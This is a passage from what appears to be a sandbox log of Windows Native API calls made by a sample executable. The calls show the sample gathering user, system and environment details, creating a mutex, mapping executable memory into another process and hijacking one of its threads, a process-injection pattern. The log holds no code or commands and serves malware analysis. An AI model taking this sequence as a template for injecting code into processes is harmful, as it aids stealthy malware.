DosPathName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtPathName=0xdf064, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.373] NtCreateFile (in: FileHandle=0xdf084, DesiredAccess=0x120089, ObjectAttributes=0xdf04c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf06c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf084*=0x20, IoStatusBlock=0xdf06c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0185.373] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505550) returned 1 [0185.381] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0xdf06c, FileInformation=0xdefc4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf06c, FileInformation=0xdefc4) returned 0x0 [0185.381] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x99400) returned 0x791020 [0185.485] NtReadFile (in: FileHandle=0x20, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf06c, Buffer=0x791020, BufferLength=0x99000, ByteOffset=0xdefdc*=0, Key=0x0 | out: IoStatusBlock=0xdf06c, Buffer=0x791020*) returned 0x0 [0185.510] NtClose (Handle=0x20) returned 0x0 [0185.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtPathName=0xdf054, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.510] NtCreateFile (in: FileHandle=0xdf074, DesiredAccess=0x120089, ObjectAttributes=0xdf03c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf05c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf074*=0x20, IoStatusBlock=0xdf05c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0185.510] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505550) returned 1 [0185.510] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0xdf05c, FileInformation=0xdefb4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf05c, FileInformation=0xdefb4) returned 0x0 [0185.510] NtClose (Handle=0x20) returned 0x0 [0185.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xde554, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.511] NtCreateFile (in: FileHandle=0xde574, DesiredAccess=0x120089, ObjectAttributes=0xde53c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde55c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde574*=0x20, IoStatusBlock=0xde55c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0185.511] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505550) returned 1 [0185.511] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0xde55c, FileInformation=0xde2d0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xde55c, FileInformation=0xde2d0) returned 0x0 [0185.511] NtClose (Handle=0x20) returned 0x0 [0185.511] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x208) returned 0x5170d8 [0185.512] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5170d8) returned 1 [0185.904] NtWaitForSingleObject (Object=0x1f0, Alertable=0, Time=0x0) returned 0x0 [0187.346] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde940 | out: Value="C:\\Program Files (x86)") returned 0x0 [0187.375] SetErrorMode (uMode=0x8003) returned 0x1 [0187.378] NtCreateSection (in: SectionHandle=0xdeccc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xdea4c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdeccc*=0x1f8) returned 0x0 [0187.384] NtMapViewOfSection (in: SectionHandle=0x1f8, ProcessHandle=0xffffffff, BaseAddress=0xdecd0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea4c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xdecd0*=0x5ef0000, SectionOffset=0x0, ViewSize=0xdea4c*=0x29000) returned 0x0 [0187.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea44*=0x0, ZeroBits=0x0, RegionSize=0xdea48*=0x28c00, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xdea44*=0x5f20000, RegionSize=0xdea48*=0x29000) returned 0x0 [0187.396] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x51b5e8 [0187.396] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde788 | out: TokenHandle=0xde788*=0x1f4) returned 0x0 [0187.413] NtQueryInformationToken (in: TokenHandle=0x1f4, TokenInformationClass=0x1, TokenInformation=0xddf80, TokenInformationLength=0x400, ReturnLength=0xde780 | out: TokenInformation=0xddf80, ReturnLength=0xde780) returned 0x0 [0187.415] ConvertSidToStringSidW (in: Sid=0xddf88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde784 | out: StringSid=0xde784*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0187.415] NtClose (Handle=0x1f4) returned 0x0 [0187.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9f8*=0x0, ZeroBits=0x0, RegionSize=0xde9fc*=0x8f636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9f8*=0x5f50000, RegionSize=0xde9fc*=0x90000) returned 0x0 [0187.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9e4*=0x0, ZeroBits=0x0, RegionSize=0xde9e8*=0x8f636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9e4*=0x5fe0000, RegionSize=0xde9e8*=0x90000) returned 0x0 [0187.433] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51b5e8) returned 1 [0187.434] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x51b5e8 [0187.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0187.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0187.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0187.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0187.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0187.444] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde110 | out: Value="RDhJ0CNFevzX") returned 0x0 [0187.444] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde47c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0187.444] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde46c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0187.444] NtCreateSection (in: SectionHandle=0xdfabc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde494, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdfabc*=0x1f4) returned 0x0 [0187.445] NtMapViewOfSection (in: SectionHandle=0x1f4, ProcessHandle=0xffffffff, BaseAddress=0xdfab8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde494*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdfab8*=0x6400000, SectionOffset=0x0, ViewSize=0xde494*=0x1b58000) returned 0x0 [0187.447] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x51c5f0 [0187.447] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddc2c | out: TokenHandle=0xddc2c*=0x204) returned 0x0 [0187.447] NtQueryInformationToken (in: TokenHandle=0x204, TokenInformationClass=0x1, TokenInformation=0xdd424, TokenInformationLength=0x400, ReturnLength=0xddc24 | out: TokenInformation=0xdd424, ReturnLength=0xddc24) returned 0x0 [0187.447] ConvertSidToStringSidW (in: Sid=0xdd42c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddc28 | out: StringSid=0xddc28*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0187.448] NtClose (Handle=0x204) returned 0x0 [0187.514] RtlIntegerToChar (in: Value=0x88c53315, Base=0x10, Length=0x20, String=0x640a4a9 | out: String="88C53315") returned 0x0 [0187.523] NtCreateKey (in: KeyHandle=0xde6a0, DesiredAccess=0x20219, ObjectAttributes=0xddc2c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde6a0*=0x204) returned 0x0 [0187.529] NtQueryValueKey (in: KeyHandle=0x204, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0xde278, Length=0x100, ResultLength=0xde6f4 | out: KeyValueInformation=0xde278*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x1e, NameLength=0x16, Name="ProductName", Data="Windows 10 Pro"), ResultLength=0xde6f4) returned 0x0 [0187.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc5c*=0x0, ZeroBits=0x0, RegionSize=0xddc60*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc5c*=0x7f60000, RegionSize=0xddc60*=0x1f5000) returned 0x0 [0187.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc48*=0x0, ZeroBits=0x0, RegionSize=0xddc4c*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc48*=0x8160000, RegionSize=0xddc4c*=0x1f5000) returned 0x0 [0187.530] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0xddc4c | out: Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x0 [0187.530] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xddc14 | out: Value="C:\\Program Files (x86)") returned 0x0 [0187.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x12d5a9, lpParameter=0xdf2e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x208 [0187.568] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x5205f8 [0187.570] NtOpenDirectoryObject (in: FileHandle=0xde48c, DesiredAccess=0x2000f, ObjectAttributes=0xde458*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xde48c*=0x20c) returned 0x0 [0187.570] NtCreateMutant (in: MutantHandle=0xde710, DesiredAccess=0x1f0001, ObjectAttributes=0xde440*(Length=0x18, RootDirectory=0x20c, ObjectName="9PNO-9-W2-I5-33E", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xde710*=0x210) returned 0x0 [0187.570] NtClose (Handle=0x20c) returned 0x0 [0188.135] NtOpenProcess (in: ProcessHandle=0xdea74, DesiredAccess=0x438, ObjectAttributes=0xdea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea54*(UniqueProcess=0x5d0, UniqueThread=0x0) | out: ProcessHandle=0xdea74*=0x218) returned 0x0 [0188.135] NtQueryInformationProcess (in: ProcessHandle=0x218, ProcessInformationClass=0x1a, ProcessInformation=0xdea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea64, ReturnLength=0x0) returned 0x0 [0188.135] NtMapViewOfSection (in: SectionHandle=0x1f4, ProcessHandle=0x218, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea5c*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdea60*=0x10c80000, SectionOffset=0x0, ViewSize=0xdea5c*=0x1b58000) returned 0x0 [0188.137] NtClose (Handle=0x218) returned 0x0 [0188.140] NtDelayExecution (Alertable=0, Interval=0xde6bc*=-50000000) returned 0x0 [0193.199] NtOpenProcess (in: ProcessHandle=0xde678, DesiredAccess=0x438, ObjectAttributes=0xddc28*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xddc68*(UniqueProcess=0x5d0, UniqueThread=0x0) | out: ProcessHandle=0xde678*=0x214) returned 0x0 [0193.205] NtQueryInformationProcess (in: ProcessHandle=0x214, ProcessInformationClass=0x0, ProcessInformation=0xddc78, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xddc78, ReturnLength=0x0) returned 0x0 [0193.214] NtOpenThread (in: ThreadHandle=0xddc20, DesiredAccess=0x1a, ObjectAttributes=0xddc28, ClientId=0xddc58*(UniqueProcess=0x0, UniqueThread=0x5d4) | out: ThreadHandle=0xddc20*=0x218) returned 0x0 [0193.220] NtSuspendThread (in: ThreadHandle=0x218, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0193.229] NtGetContextThread (in: ThreadHandle=0x218, Context=0xde170 | out: Context=0xde170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xe0, [65]=0x21, [66]=0xd9, [67]=0x61, [68]=0xfb, [69]=0x7f, [70]=0x0, [71]=0x0, [72]=0xa0, [73]=0x8e, [74]=0xce, [75]=0x4, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xfffffffa, SegGs=0x0, SegFs=0x6133d0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x10122, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x70, [5]=0xf8, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x9d, [23]=0x5f, [24]=0xfb, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xa0, [29]=0xa, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x33, [39]=0x5f, [40]=0xfb, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xb4, [47]=0x60, [48]=0xfb, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0193.242] NtCreateSection (in: SectionHandle=0xddc00, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xddba0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xddc00*=0x21c) returned 0x0 [0193.246] NtMapViewOfSection (in: SectionHandle=0x21c, ProcessHandle=0x214, BaseAddress=0xddc08*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddba8*=0xe0636, InheritDisposition=0x7ffb00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddc08*=0x8eb0000, SectionOffset=0x0, ViewSize=0xddba8*=0xe1000) returned 0x0 [0193.254] NtMapViewOfSection (in: SectionHandle=0x21c, ProcessHandle=0xffffffffffffffff, BaseAddress=0xddbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddba8*=0xe1000, InheritDisposition=0x7ffb00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbf8*=0x8390000, SectionOffset=0x0, ViewSize=0xddba8*=0xe1000) returned 0x0 [0193.309] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x8390000) returned 0x0 [0193.358] NtClose (Handle=0x21c) returned 0x0 [0193.362] NtSetContextThread (ThreadHandle=0x218, Context=0xde170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xe0, [65]=0x21, [66]=0xd9, [67]=0x61, [68]=0xfb, [69]=0x7f, [70]=0x0, [71]=0x0, [72]=0xa0, [73]=0x8e, [74]=0xce, [75]=0x4, [76]=0x0, 